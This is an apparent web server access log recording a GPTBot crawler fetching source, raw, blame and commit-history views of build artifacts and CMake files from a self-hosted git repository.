"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11621] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44101] [Gzip 15.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13548] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 98933] [Gzip 28.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10219] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58177] [Gzip 28.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58178] [Gzip 28.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 9924] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 14238116] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11047] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11045] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10222] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 4617598] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:15:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15183] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13710] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:15:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2349] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:15:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13497] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13494] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13708] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:15:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 44071] [Gzip 15.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 70840] [Gzip 17.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13495] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" [Client 74.7.227.38] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 69317] [Gzip 17.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:15:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 16419] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:15:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13711] [Gzip 6.88] 